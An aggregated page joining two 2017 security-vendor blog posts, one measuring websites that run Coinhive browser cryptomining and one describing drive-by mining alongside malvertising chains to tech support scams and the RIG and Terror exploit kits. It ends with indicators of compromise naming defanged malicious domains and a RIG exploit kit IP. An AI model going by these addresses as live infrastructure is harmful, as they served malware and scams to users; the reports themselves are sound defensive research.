We looked up these domains in our passive DNS (pDNS) database. 794 domains were found with records among the 1026 domains in total. We found that the first DNS query to many domains dates back to the launch date of our pDNS in 2013, such as uptobox[.]com, torrent[.]cd, and tiexue[.]net. This means these websites have been active for a long time. Some of them are quite popular based on their Alexa ranking. So, the potential impact of Coinhive can be high in both time and space. We also found that the first DNS query to 502 (63%) domains happened in October 2017. Based on the figure below, we can clearly see the emerging trend of these domains.


We further investigated the DNS query pattern of these domains. In particular, the following graph shows the number of DNS queries to these website per hour. Interestingly, we found that some domains exhibit very similar patterns. Although the start time and amount of traffic are slightly different, the overall pattern of traffic is very much similar in shape. This is another indicator that these domains potentially belong to the same campaign launched by the same owner.


In addition, we analyzed the distribution of IPs to which these domains were resolved. We identified 1,172 IPs in total, located in 47 different countries with the majority being in US. Below is the figure showing the country-level distribution of these IPs.


Whois analysis

Through querying public Whois server as well as Domaintools, we obtained 861 valid whois records of 1,025 domains. We break the results down by registrant/emails and their registration dates.

  • Registrant/Emails: Not much can be learned due to the fact that most (521) are privacy protected by WhoisGuard. In the remaining registrants, there are also fake ones such as Administrator and Private Person. After removing the useless entries, we are only left with 80 different registrants, with no more than one registrant appearing more than 3 times. All the .bid domains are privacy protected. Since WhoisGuard service is not free (around $3/year), the .bid campaign actors are probably earning enough profit to offset this cost.
  • Registration date: To better present details in registration date, we separate domains with different TLDs:


For .bid domains that we are able to retrieve whois information, most are registered after 10/01/2017 but spanning across multiple days, showing that the campaign is very recent and it has a rotating number of domains refreshing every day.


On the contrary, most .download domains were registered within 3 days of 09/14-09/16, 2017, with only a handful added on later. This looks to be a different campaign than the .bid ones. Similar registration trend can be found on .review domains (87 out of 103 are registered on the 3rd, 7th, and 8th of October 2017).


Finally, after we exclude the suspected campaign domains (.bid, .download, .review, .top, .win), the registration dates are extremely spread out from as early as 2001 to the current date. These domains are most likely either embracing the new crypto-mining monetization fever, or compromised by attackers to take advantage of their established reputation and high-volume visitors.

Victim analysis

The URLs we crawled to detect crypto-miner presence comes from our PANDB cloud log. In this section, we analyze the demographics of visitors to such sites to shed some insights on their real-world impact.


This figure shows the general geographic distribution of visitors to crypto-mining sites. While the US clearly dominates in total visiting counts, Europe and Asia Pacific is not too far behind. This graph indicates a broad spectrum of victims all across the globe.

After breaking down visits site-by-site, we found that the most visited sites more or less align with their Alexa ranking, with over 40K visits* to the 123moviews[.]co:


We only log a query when customer(s) using the same device visits the site for the first time in a TTL window. This does not count duplicate visits to the same site within a short timeframe. Therefore, the visits estimations are a lower bound.


As AdGuard has pointed out, the use of coinhive or similar mining services is itself not a malicious activity, it is how they are used that makes the sites malicious. Unfortunately, for the sites that we were able to observe engaging in crypto-mining activities, none of them has prompted the user with any sort of warning, let alone providing the kill switch for mining. With Bitcoin soaring over $5K (at time of writing), we can only expect more of such services spawning from everywhere. To protect yourself from this fast-growing threat, we recommend two options:

  • Palo Alto Networks is blocking URLs hosting the Coinhive JavaScript files through PANDB, as these scripts are consuming system resources without the users’ knowledge or consent.
  • In addition, popular browser plugins such as Adblock plus or Adguard will also block such mining scripts. Combine it with our firewall solution, you can rest assured that your previous CPU time and electricity is not exploited by sneaky scripts.
  • Users interested in Domains hosting Coinhive script files included in this analysis can access them here.

The post Unauthorized Coin Mining in the Browser appeared first on Palo Alto Networks Blog.

Go to Source
Author: Yuchen Zhou

Powered by WPeMatico

Drive-by mining and ads: The Wild Wild West

There seems to be a trend lately for publishers to monetize their traffic by having their visitors mine for cryptocurrencies while on their site. The idea is that you are accessing content for free and in exchange, your computer (its CPU in particular) will be used for mining purposes.

The Pirate Bay started to run a miner on its site and later publicly acknowledged it. In other cases, the mining was a byproduct of malicious adverts or done via legitimate but compromised websites that are being injected with cryptomining code directly.

Needless to say, this practice is raising many eyebrows and not everyone is on the same page about whether this new business model could be a long-term replacement for ads (although most people agree that ads are often annoying and malicious).

But what exactly happens when publishers turn your PC into a miner and display ads at the same time? In this post, we take a look at what is arguably a bad mix.

Drive-by mining

Because mining happens in the browser via JavaScript without user interaction, we could compare it to drive-by downloads. As publishers need to retain the visitor’s attention so that the JavaScript code runs uninterrupted for as long as possible, this is where the type of content matters. We know that for example gaming or video streaming sites tend to keep people on their page much longer than others.

Figure 1: A streaming site that is (not so) silently mining cryptocurrency

There is one exception here, in that in some cases, loading the JavaScript mining code once is enough, no matter whether the user decides to change site afterward, the mining will continue. This particular abuse technique affects Internet Explorer (i.e. the zombie script) and was identified and reported (but not fixed yet) by Manuel Caballero.

This concept of mining digital currency via the browser is a little odd at first because it is well known how resource intensive mining can be, requiring powerful machines loaded with expensive hardware. While this is true for Bitcoin, it is not for other currencies that were designed for ordinary CPUs.

Take the Monero digital currency, powered by the CryptoNight algorithm, which can be mined with a standard CPU with little difference in overall results compared to running more advanced hardware. This literally opens the door to a large and still mostly untapped market comprised of millions of typical consumer machines. Coinhive advertises itself as “A Crypto Miner for your Website” and enables website owners to quickly set up mining by using their JavaScript API.

Figure 2: JavaScript API/code from Coinhive on the client side used to mine cryptocurrency

Gaming and video sites typically are more resource intensive, so it seems to make little sense to run a miner at the same time without having a noted impact. Having said that, many people who consume copyrighted content are perhaps less likely to complain about an under par user experience.

The question at this point is: How far can publishers push the limits towards a really bad user experience? You may be surprised that for many, this is not really a problem at all and that double dipping is, in fact, a fairly common practice.

Forced mining and malvertising

The same site pictured above was not only monetizing via Coinhive, but they also ran adverts. Clicking anywhere on the page – including the ‘Play’ button on the video – triggered a pop under advert that ran through various ad exchanges and resulted in malvertising in almost all instances, leading to tech support scams and several different exploit kit infection chains.

Tech support scams

Tech support scams are one of the most common redirections we see these days. While they do not usually infect your computer, they are still a threat to consider. The most common symptom is referred to as ‘Browlock’ because scammers use code that prevents you from normally closing your browser. The claims are always excessive and designed to scare users about made up infections. Victims that call the posted number for help end up with more computer issues and several hundreds of dollars less in their wallet.

Figure 3: Malvertising leading to tech support scam (Browlock) is triggered when clicking anywhere on the page

Figure 4: Web traffic showing redirection sequence from publisher to tech support scam page

RIG exploit kit

RIG is the most popular exploit kit these days and malvertising is its prime delivery mechanism. Victims are filtered using the same tools that marketers have to profile consumers, and there can be a secondary level of filtering, usually via a gate that performs geolocation checks for example.

Figure 5: RIG EK via malvertising chain

Terror exploit kit

Terror EK is on a much smaller distribution scale than RIG but is still a fairly active exploit kit that tries out different things. For instance, some Terror EK infection chains use SSL encryption (via free certificates from Let’s Encrypt). It also has an interesting gate with one of the most convoluted iframe encodings we have seen.

Figure 6: Terror EK via malvertising, and gate before landing page

Block less or more?

One of the first reactions to the rise of browser cryptominers was to ask how to block them, whether with a typical ad blocker or URL/IP blacklist and even by disabling JavaScript. There’s no question that users are annoyed by a rollout that did not include their opinion, even though many were actually favorable to this alternate solution to online ads.

While cryptominers do have an impact on system resources, there was at least a sense that they may be safer and less intrusive than ads. But publishers ought to be more transparent with their audience because no-one likes unannounced guests. Unfortunately, there will always be publishers that care very little about what kind of traffic they push, so long as it generates good revenues; for those, cryptominers are just an added income to their existing advertising portfolio.

Malwarebytes users are already protected against this drive-by mining. In fact, we are blocking over 5 million connection attempts to Coinhive every single day, which shows that browser-based mining has really taken off in a big way.

Our goal is to protect people from unsolicited drive-by cryptomining. However, for those users that are aware and want to participate in mining, they can absolutely do so by adding an exclusion for this domain.

Indicators of compromise

Tech support scam



Fobos: hudsonentertainment[.]info/
Fobos: 204hdchdhhh[.]cf/tako/?re=6128546021
RIG IP: 188.225.83[.]85

Terror EK


The post Drive-by mining and ads: The Wild Wild West appeared first on Malwarebytes Labs.

Go to Source
Author: Jérôme Segura